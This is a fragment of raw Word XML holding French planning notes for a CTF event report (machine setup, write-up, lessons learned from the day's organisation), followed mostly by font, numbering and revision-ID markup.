          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Config Machine + Write Up</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Pas d'état de l'ar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">t </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2 versions de PDF : imprimable ou pas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="720"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Biblio : Géo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="720"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Organisation de la journée du CTF -&gt; retour d'exp  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">binaire qui marchait pas / patch à l'arrache des machines tempsflag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">ajout du wifi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>refresh dans le classement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">projo au dernier moment </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>interface admin : couper au bon moment / mot de passe oublié</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="720"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>CHANGER LES FIGURES - JUSTIFIER LE TEXTE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="720"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
      <w:pgNumType w:fmt="decimal"/>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WenQuanYi Micro Hei"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Wingdings">
    <w:altName w:val="Abyssinica SIL"/>
    <w:panose1 w:val="05000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="1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WenQuanYi Micro Hei"/>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mbria">
    <w:altName w:val="Georgia"/>
    <w:panose1 w:val="02040503050406030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Calibri">
    <w:altName w:val="Arial"/>
    <w:panose1 w:val="020F0502020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="decorative"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="SimSun">
    <w:altName w:val="WenQuanYi Micro Hei"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Symbol">
    <w:altName w:val="Webdings"/>
    <w:panose1 w:val="05050102010706020507"/>
    <w:charset w:val="02"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="80000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Angsana New">
    <w:altName w:val="FreeSerif"/>
    <w:panose1 w:val="02020603050405020304"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00010001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Cordia New">
    <w:altName w:val="Loma"/>
    <w:panose1 w:val="020B0304020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00010001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Tahoma">
    <w:altName w:val="Aroania"/>
    <w:panose1 w:val="020B0604030504040204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000029" w:usb3="00000000" w:csb0="000101FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:altName w:val="Liberation Sans Narrow"/>
    <w:panose1 w:val="020B0609020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="decorative"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Kedage">
    <w:panose1 w:val="00000400000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00400000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Arial Black">
    <w:panose1 w:val="020B0A04020102020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000287" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="2000009F" w:csb1="DFD70000"/>
  </w:font>
  <w:font w:name="Andale Mono">
    <w:panose1 w:val="020B0509000000000004"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000287" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="6000009F" w:csb1="DFD70000"/>
  </w:font>
  <w:font w:name="Georgia">
    <w:panose1 w:val="02040502050405020303"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000287" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="2000009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="WenQuanYi Micro Hei">
    <w:panose1 w:val="020B0606030804020204"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E10002EF" w:usb1="6BDFFCFB" w:usb2="00800036" w:usb3="00000000" w:csb0="603E019F" w:csb1="DFD70000"/>
  </w:font>
  <w:font w:name="DejaVa Sans">
    <w:altName w:val="Kedage"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Abyssinica SIL">
    <w:panose1 w:val="02000603020000020004"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="800000EF" w:usb1="5000A04B" w:usb2="00000828" w:usb3="00000000" w:csb0="20000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Webdings">
    <w:panose1 w:val="05030102010509060703"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="80000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="FreeSerif">
    <w:panose1 w:val="02020603050405020304"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E59FAFFF" w:usb1="C200FDFF" w:usb2="43501B29" w:usb3="04000043" w:csb0="600101FF" w:csb1="FFFF0000"/>
  </w:font>
  <w:font w:name="Loma">
    <w:panose1 w:val="020B0504020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="8100002F" w:usb1="50002009" w:usb2="00000000" w:usb3="00000000" w:csb0="00010001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Aroania">
    <w:panose1 w:val="020B0604030504040204"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E00002FF" w:usb1="5200F8DB" w:usb2="05000021" w:usb3="00800040" w:csb0="0000009F" w:csb1="DFD70000"/>
  </w:font>
  <w:font w:name="Liberation Sans Narrow">
    <w:panose1 w:val="020B0606020202030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="A00002AF" w:usb1="500078FB" w:usb2="00000000" w:usb3="00000000" w:csb0="6000009F" w:csb1="DFD70000"/>
  </w:font>
  <w:font w:name="Calibri Light">
    <w:altName w:val="Arial"/>
    <w:panose1 w:val="020F0302020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Roboto">
    <w:altName w:val="Kedage"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000020" w:usb3="00000000" w:csb0="2000019F" w:csb1="4F010000"/>
  </w:font>
  <w:font w:name="monospace">
    <w:altName w:val="Kedage"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Alexander">
    <w:panose1 w:val="02020602090805090A03"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E00002FF" w:usb1="5200F8DB" w:usb2="05000021" w:usb3="00800040" w:csb0="0000009F" w:csb1="DFD70000"/>
  </w:font>
  <w:font w:name="+Body">
    <w:altName w:val="Kedage"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Ubuntu">
    <w:panose1 w:val="020B0604030602030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E00002FF" w:usb1="5000205B" w:usb2="00000000" w:usb3="00000000" w:csb0="2000009F" w:csb1="56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1"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="20"/>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2" name="TextBox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sz w:val="18"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="begin"/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="18"/>
                            </w:rPr>
                            <w:instrText xml:space="preserve"> PAGE  \* MERGEFORMAT </w:instrText>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="18"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="separate"/>
                          </w:r>
                          <w:r>
                            <w:t>2</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t>2</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="end"/>
                    </w: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1"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="20"/>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3" name="TextBox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sz w:val="18"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="begin"/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="18"/>
                            </w:rPr>
                            <w:instrText xml:space="preserve"> PAGE  \* MERGEFORMAT </w:instrText>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="18"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="separate"/>
                          </w:r>
                          <w:r>
                            <w:t>1</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t>1</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="end"/>
                    </w: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1"/>
      <w:rPr>
        <w:lang w:val="fr-FR"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="20"/>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4" name="TextBox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sz w:val="18"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="begin"/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="18"/>
                            </w:rPr>
                            <w:instrText xml:space="preserve"> PAGE  \* MERGEFORMAT </w:instrText>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="18"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="separate"/>
                          </w:r>
                          <w:r>
                            <w:t>4</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t>4</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="18"/>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08"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="FFFFFF"/>
      </w:rPr>
      <w:t>Table des matières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3"/>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08"/>
      <w:tabs>
        <w:tab w:val="left" w:pos="525"/>
        <w:tab w:val="left" w:pos="960"/>
        <w:tab w:val="left" w:pos="3855"/>
      </w:tabs>
      <w:rPr>
        <w:lang w:val="fr-F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4294967171">
    <w:nsid w:val="FFFFFF83"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FFFFFF83"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="52"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4294967177">
    <w:nsid w:val="FFFFFF89"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FFFFFF89"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="51"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Cambria" w:hAnsi="Cambria"/>
        <w:color w:val="7E97AD" w:themeColor="accent1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="accent1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4294967168">
    <w:nsid w:val="FFFFFF80"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FFFFFF80"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="55"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1800"/>
        </w:tabs>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4294967169">
    <w:nsid w:val="FFFFFF81"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FFFFFF81"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="54"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4294967170">
    <w:nsid w:val="FFFFFF82"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FFFFFF82"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="53"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="914319941">
    <w:nsid w:val="367F6A45"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="367F6A45"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="61"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="62"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="432"/>
        </w:tabs>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:pStyle w:val="63"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="792" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:pStyle w:val="64"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1152" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:pStyle w:val="65"/>
      <w:lvlText w:val="(%5)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1512" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="(%6)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1872" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2232" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2592" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2952" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="4294967177"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="4294967171"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="4294967170"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="4294967169"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="4294967168"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="91431994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720"/>
  <w:hyphenationZone w:val="425"/>
  <w:displayHorizontalDrawingGridEvery w:val="1"/>
  <w:displayVerticalDrawingGridEvery w:val="1"/>
  <w:noPunctuationKerning w:val="1"/>
  <w:characterSpacingControl w:val="doNotCompress"/>
  <w:compat>
    <w:doNotExpandShiftReturn/>
    <w:doNotBreakWrappedTables/>
    <w:doNotWrapTextWithPunct/>
    <w:doNotUseEastAsianBreakRules/>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2A27"/>
    <w:rsid w:val="00054E17"/>
    <w:rsid w:val="000F058B"/>
    <w:rsid w:val="001D5D54"/>
    <w:rsid w:val="00206839"/>
    <w:rsid w:val="0022040F"/>
    <w:rsid w:val="00234603"/>
    <w:rsid w:val="002A1895"/>
    <w:rsid w:val="002C26EC"/>
    <w:rsid w:val="002C465D"/>
    <w:rsid w:val="002F6DFD"/>
    <w:rsid w:val="00404E2B"/>
    <w:rsid w:val="004260E9"/>
    <w:rsid w:val="004517B6"/>
    <w:rsid w:val="00482DF7"/>
    <w:rsid w:val="004D24BC"/>
    <w:rsid w:val="0066428F"/>
    <w:rsid w:val="00675A81"/>
    <w:rsid w:val="006C0B85"/>
    <w:rsid w:val="006E61FC"/>
    <w:rsid w:val="006F3D4B"/>
    <w:rsid w:val="007378C7"/>
    <w:rsid w:val="00743AB3"/>
    <w:rsid w:val="00812C68"/>
    <w:rsid w:val="0082238F"/>
    <w:rsid w:val="008A673C"/>
    <w:rsid w:val="008D1AB7"/>
    <w:rsid w:val="009248D0"/>
    <w:rsid w:val="00967F10"/>
    <w:rsid w:val="009803FB"/>
    <w:rsid w:val="00A452C0"/>
    <w:rsid w:val="00AF23E9"/>
    <w:rsid w:val="00B8487C"/>
    <w:rsid w:val="00BC0C25"/>
    <w:rsid w:val="00BF5905"/>
    <w:rsid w:val="00C024F5"/>
    <w:rsid w:val="00C173E8"/>
    <w:rsid w:val="00C62F60"/>
    <w:rsid w:val="00CA4387"/>
    <w:rsid w:val="00CF1FBB"/>
    <w:rsid w:val="00DB5660"/>
    <w:rsid w:val="00E25ADA"/>
    <w:rsid w:val="00E84711"/>
    <w:rsid w:val="00E96C32"/>
    <w:rsid w:val="00EA7C87"/>
    <w:rsid w:val="00F2697E"/>
    <w:rsid w:val="00F56F55"/>
    <w:rsid w:val="00F63F5B"/>
    <w:rsid w:val="00FB05C3"/>
    <w:rsid w:val="07F78B8B"/>
    <w:rsid w:val="0AFFF3CF"/>
    <w:rsid w:val="0CFFE0E4"/>
    <w:rsid w:val="0DFF7E90"/>
    <w:rsid w:val="14EB28D9"/>
    <w:rsid w:val="16FE8B6A"/>
    <w:rsid w:val="17FB53C9"/>
    <w:rsid w:val="1A7BE7C7"/>
    <w:rsid w:val="1BBB8DB9"/>
    <w:rsid w:val="1CE9F0A7"/>
    <w:rsid w:val="1DDFDB41"/>
    <w:rsid w:val="1DF6334E"/>
    <w:rsid w:val="1EA72C08"/>
    <w:rsid w:val="1EEBEF67"/>
    <w:rsid w:val="1F6D9993"/>
    <w:rsid w:val="1FCF3F86"/>
    <w:rsid w:val="1FD653DD"/>
    <w:rsid w:val="1FDFE19D"/>
    <w:rsid w:val="1FEDFADC"/>
    <w:rsid w:val="1FF2F586"/>
    <w:rsid w:val="26EF0290"/>
    <w:rsid w:val="27E0CDC6"/>
    <w:rsid w:val="27E32CEB"/>
    <w:rsid w:val="27FEB359"/>
    <w:rsid w:val="2A3DC926"/>
    <w:rsid w:val="2BD82743"/>
    <w:rsid w:val="2CD9BDF8"/>
    <w:rsid w:val="2D7EF7D8"/>
    <w:rsid w:val="2E7A1847"/>
    <w:rsid w:val="2FD3AA99"/>
    <w:rsid w:val="2FFE6BF5"/>
    <w:rsid w:val="2FFF0CAF"/>
    <w:rsid w:val="31F77E66"/>
    <w:rsid w:val="35FE8D82"/>
    <w:rsid w:val="36B76663"/>
    <w:rsid w:val="36FA12AE"/>
    <w:rsid w:val="3743ABAE"/>
    <w:rsid w:val="377F8843"/>
    <w:rsid w:val="37A3A95B"/>
    <w:rsid w:val="37FB6A37"/>
    <w:rsid w:val="38EEBA10"/>
    <w:rsid w:val="39BEE99B"/>
    <w:rsid w:val="39E751BA"/>
    <w:rsid w:val="39FFBB58"/>
    <w:rsid w:val="3A9E4F1A"/>
    <w:rsid w:val="3AA9CE15"/>
    <w:rsid w:val="3AFE788A"/>
    <w:rsid w:val="3AFFD5FA"/>
    <w:rsid w:val="3B6E9AE4"/>
    <w:rsid w:val="3BF6CB66"/>
    <w:rsid w:val="3BFFF9EF"/>
    <w:rsid w:val="3CD795FB"/>
    <w:rsid w:val="3D7F16F9"/>
    <w:rsid w:val="3DF3C155"/>
    <w:rsid w:val="3DFA89CB"/>
    <w:rsid w:val="3E60F023"/>
    <w:rsid w:val="3E7AA705"/>
    <w:rsid w:val="3ED1683D"/>
    <w:rsid w:val="3EEFD2F9"/>
    <w:rsid w:val="3EF5E286"/>
    <w:rsid w:val="3EFC68AC"/>
    <w:rsid w:val="3EFD9840"/>
    <w:rsid w:val="3EFE6FC1"/>
    <w:rsid w:val="3EFFDBA3"/>
    <w:rsid w:val="3F262C08"/>
    <w:rsid w:val="3F6BD04B"/>
    <w:rsid w:val="3F85929B"/>
    <w:rsid w:val="3F9FCC24"/>
    <w:rsid w:val="3FC96C12"/>
    <w:rsid w:val="3FDB25C4"/>
    <w:rsid w:val="3FE7DD89"/>
    <w:rsid w:val="3FEF4977"/>
